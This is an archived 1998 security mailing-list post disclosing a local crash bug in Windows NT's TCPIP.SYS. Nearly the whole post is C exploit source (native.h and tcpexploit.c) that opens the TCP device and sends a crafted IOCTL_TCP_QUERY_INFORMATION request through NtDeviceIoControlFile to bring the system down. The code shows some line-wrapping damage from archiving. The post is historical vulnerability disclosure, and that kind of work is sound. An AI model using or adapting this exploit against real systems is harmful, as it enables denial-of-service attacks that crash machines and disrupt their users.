Crashing NT with Native Calls

From: Luigi Mori (lmat_private)
Date: Wed Sep 23 1998 - 09:16:31 PDT

  • Next message: Taeho Oh: "imapd exploit for x86 linux" 

    Hi,
Playing with TCPIP.SYS I've noticed that every user could crash the
system just calling the undocumented function NtDeviceIoControlFile with
an handle to TCPIP and the "right" parameters.

This is the exploit:

--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h

typedef struct {
        unsigned int    bo;
        unsigned int    result;
        HANDLE                          hevent;
} nt_overlapped;

#define IOCTL_TCP_QUERY_INFORMATION     0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include <ntddk.h>
#include <stdio.h>
#include <tdiinfo.h>
#include "native.h"

#define MAX_NAME_LEN    256

struct {
        HANDLE  h_tcp;
        char    buff[0x400];
} g;


unsigned int
open_tcp()
{
        OBJECT_ATTRIBUTES       object_attrs;
        UNICODE_STRING  device_tcp;
        WCHAR   device_tcp_buff[MAX_NAME_LEN];
        IO_STATUS_BLOCK io_status_block;
        NTSTATUS        status;

        device_tcp.Buffer = &device_tcp_buff;
        RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");

        InitializeObjectAttributes(&object_attrs, &device_tcp,
OBJ_CASE_INSENSITIVE, NU
LL, NULL);

        status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
&io_status_block, 0,

        FILE_AT
TRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,

                FILE_OPEN_IF,

                0, NULL, 0);
        if(status != STATUS_SUCCESS) {
                printf("ZwCreateFile error %#x %#x\n", status,
io_status_block);

                return 0;
        }

        return 1;
}

void
close_tcp()
{
        ZwClose(g.h_tcp);
}

unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,

        void *out_buff, unsigned int out_buff_len)
{
        NTSTATUS        status;
        nt_overlapped   prova;
        unsigned int i, *p;

        status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
        if(status != STATUS_SUCCESS) {
                printf("NtCreateEvent error 0x#x\n", status);

                return 0;
        }

        status =  NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,

                                                        &prova,
IOCTL_TCP_QUERY_INFORMA
TION,

                                                        in_buff,
in_buff_len,

                                                        out_buff,
out_buff_len);

        ZwClose(prova.hevent);

        printf("%#X\n", status);

        return 1;
}

void    __cdecl
main()
{
        struct tcp_request_query_information_ex in_buff;

        if(!open_tcp()) {
                return;
        }

        in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        in_buff.ID.toi_entity.tei_instance = 0;
        in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
        in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
        in_buff.ID.toi_id = 0x5;

        if(!tcp_query_information(&in_buff, 0x24, g.buff,
sizeof(g.buff))) {
                return;
        }

        close_tcp();
}
----------------- end tcpexploit.c ---------------------------------

Luigi Mori --
Symbolic (http://www.symbolic.it)
Now Nuclear Free !!!

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:27 PDT